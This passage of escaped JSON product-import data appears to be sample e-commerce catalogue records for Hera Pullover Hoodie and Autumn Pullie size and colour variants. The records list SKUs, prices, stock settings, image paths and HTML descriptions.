Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hera-pullover-hoodie-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1009\":{\"sku\":\"WH02-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Hera Pullover Hoodie-L-Orange\",\"description\":\"<p>Get ready to rule the studio and dominate the yoga mat in the Hera Pullover Hoodie, a cozy yet classy look for any level of yogi.<\\/p>\\n<p>&bull; Teal with purple stiching.<br \\/>&bull; Hoodie pullover.<br \\/>&bull; Snug fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hera-pullover-hoodie-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1010\":{\"sku\":\"WH02-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Hera Pullover Hoodie-XL-Blue\",\"description\":\"<p>Get ready to rule the studio and dominate the yoga mat in the Hera Pullover Hoodie, a cozy yet classy look for any level of yogi.<\\/p>\\n<p>&bull; Teal with purple stiching.<br \\/>&bull; Hoodie pullover.<br \\/>&bull; Snug fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hera-pullover-hoodie-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh02-blue_alt1.jpg,\\/w\\/h\\/wh02-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh02-blue_alt1.jpg,\\/w\\/h\\/wh02-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1011\":{\"sku\":\"WH02-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Hera Pullover Hoodie-XL-Green\",\"description\":\"<p>Get ready to rule the studio and dominate the yoga mat in the Hera Pullover Hoodie, a cozy yet classy look for any level of yogi.<\\/p>\\n<p>&bull; Teal with purple stiching.<br \\/>&bull; Hoodie pullover.<br \\/>&bull; Snug fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hera-pullover-hoodie-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1012\":{\"sku\":\"WH02-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Hera Pullover Hoodie-XL-Orange\",\"description\":\"<p>Get ready to rule the studio and dominate the yoga mat in the Hera Pullover Hoodie, a cozy yet classy look for any level of yogi.<\\/p>\\n<p>&bull; Teal with purple stiching.<br \\/>&bull; Hoodie pullover.<br \\/>&bull; Snug fit.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hera-pullover-hoodie-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1013\":{\"sku\":\"WH02\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Hera Pullover Hoodie\",\"description\":\"<p>Get ready to rule the studio and dominate the yoga mat in the Hera Pullover Hoodie, a cozy yet classy look for any level of yogi.<\\/p>\\n<p>&bull; Teal with purple stiching.<br \\/>&bull; Hoodie pullover.<br \\/>&bull; Snug fit.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Hoodie|Pullover,material=Wool|Nylon,pattern=Solid,climate=All-weather|Cool|Mild|Spring,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WH02-XS-Blue,size=XS,color=Blue|sku=WH02-XS-Green,size=XS,color=Green|sku=WH02-XS-Orange,size=XS,color=Orange|sku=WH02-S-Blue,size=S,color=Blue|sku=WH02-S-Green,size=S,color=Green|sku=WH02-S-Orange,size=S,color=Orange|sku=WH02-M-Blue,size=M,color=Blue|sku=WH02-M-Green,size=M,color=Green|sku=WH02-M-Orange,size=M,color=Orange|sku=WH02-L-Blue,size=L,color=Blue|sku=WH02-L-Green,size=L,color=Green|sku=WH02-L-Orange,size=L,color=Orange|sku=WH02-XL-Blue,size=XL,color=Blue|sku=WH02-XL-Green,size=XL,color=Green|sku=WH02-XL-Orange,size=XL,color=Orange\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh02-blue_alt1.jpg,\\/w\\/h\\/wh02-blue_back.jpg\",\"image\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh02-blue_alt1.jpg,\\/w\\/h\\/wh02-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Hoodie|Pullover\",\"material\":\"Wool|Nylon\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Cool|Mild|Spring\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"1014\":{\"sku\":\"WH03-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Autumn Pullie-XS-Green\",\"description\":\"<p>With ultra-soft fleece fabric and an athletic design, our short-sleeve Autumn Pullie delivers a comfortable fit that makes it an everyday essential. A luxurious roll neck protects you from elements.<\\/p>\\n<p>&bull; Cayenne Short-Sleeve roll neck sweatshirt. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeves. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"autumn-pullie-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"1015\":{\"sku\":\"WH03-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Autumn Pullie-XS-Purple\",\"description\":\"<p>With ultra-soft fleece fabric and an athletic design, our short-sleeve Autumn Pullie delivers a comfortable fit that makes it an everyday essential. A luxurious roll neck protects you from elements.<\\/p>\\n<p>&bull; Cayenne Short-Sleeve roll neck sweatshirt. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeves. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"autumn-pullie-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh03-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1016\":{\"sku\":\"WH03-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Autumn Pullie-XS-Red\",\"description\":\"<p>With ultra-soft fleece fabric and an athletic design, our short-sleeve Autumn Pullie delivers a comfortable fit that makes it an everyday essential. A luxurious roll neck protects you from elements.<\\/p>\\n<p>&bull; Cayenne Short-Sleeve roll neck sweatshirt. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeves. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"autumn-pullie-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh03-red_alt1.jpg,\\/w\\/h\\/wh03-red_back.jpg\",\"image\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh03-red_alt1.jpg,\\/w\\/h\\/wh03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_